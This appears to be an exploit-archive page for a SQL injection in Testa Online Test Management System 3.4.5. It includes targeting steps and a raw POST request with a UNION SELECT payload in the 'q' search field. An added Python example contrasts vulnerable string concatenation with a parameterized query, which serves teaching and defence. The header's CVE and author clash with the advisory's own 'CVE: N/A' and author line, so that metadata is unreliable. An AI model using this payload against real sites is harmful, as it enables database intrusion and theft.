Testa Online Test Management System 3.4.5 - 'q' SQL Injection

CVE: CVE-2020-10760
Category: CWE-89
Price: Not specified
Severity: High
Author: Saeed Mohammadi
Risk: Critical
Exploitation Type: Remote
Date: 2021-08-03
CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.039
EPSSP: 0.89639

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080010

Below is a copy:

Testa Online Test Management System 3.4.5 - 'q' SQL Injection
# Exploit Title: Testa CMS 3.4.5 - 'q' SQL Injection
# Date: 2021-08-03 
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://testa.cc
# Version: v3.4.5
# Tested on: Windows
# CVE: N/A
###########################################################
.:: Description ::.
Testa Helps You To make Online Exams.
###########################################################
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target Using Testa - Online Test Management System.
Step 2 - Click on List And Search Exams.
Step 3 - Inject Your Payloads in Search Field.
###########################################################
.:: Sample Request ::.
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost
Cookie: PHPSESSID=s1n2l3b5gp3o97mr9bh2uav7t6; testa_user2=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

p=1&q='+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,39,30,31,32,33,34,35,36,37,38,39-- -
###########################################################
TAPESH DIGITAL SECURITY TEAM IRAN T.ME/ICTUS_TM
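
Added example (not part of the advisory and not Testa's own code): how a search handler that pastes the decoded 'q' field into its SQL text behaves next to one that binds it as a parameter, for a body shaped like the sample request above. The exams table, the function names and the use of Python with SQLite are assumptions made for illustration; Testa's real schema and query are not shown on this page.

```python
import sqlite3
from urllib.parse import parse_qs

def make_db():
    # Constructed stand-in for the exam list (assumption, three columns only).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE exams (id INTEGER, title TEXT, owner TEXT);
        INSERT INTO exams VALUES (1, 'Algebra midterm', 'alice'),
                                 (2, 'Physics quiz', 'bob');
    """)
    return db

def form_field(body, name):
    """Decode one field of an application/x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]

def search_concatenated(db, body):
    # Weak pattern: the decoded value becomes part of the SQL text, so a quote
    # in 'q' closes the string literal and the remainder is parsed as SQL.
    q = form_field(body, "q")
    sql = "SELECT id, title, owner FROM exams WHERE title LIKE '%" + q + "%'"
    return db.execute(sql).fetchall()

def search_parameterized(db, body):
    # Hardened pattern: 'q' is sent as a bound value and is never parsed as SQL.
    # LIKE wildcards typed by the user are escaped so they match literally.
    q = form_field(body, "q")
    for ch in ("\\", "%", "_"):
        q = q.replace(ch, "\\" + ch)
    sql = "SELECT id, title, owner FROM exams WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + q + "%",)).fetchall()

# Constructed bodies in the shape of the sample request (p=1&q=...).
BENIGN_BODY = "p=1&q=Physics"
UNION_BODY = "p=1&q='+UNION+SELECT+1,2,3-- -"
WILDCARD_BODY = "p=1&q=%25"

if __name__ == "__main__":
    db = make_db()
    for body in (BENIGN_BODY, UNION_BODY, WILDCARD_BODY):
        print(body)
        print("  concatenated :", search_concatenated(db, body))
        print("  parameterized:", search_parameterized(db, body))
```

With the concatenated query the UNION body returns a row (1, 2, 3) that does not exist in the table; with the bound parameter the same body is only a search string that matches no title.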

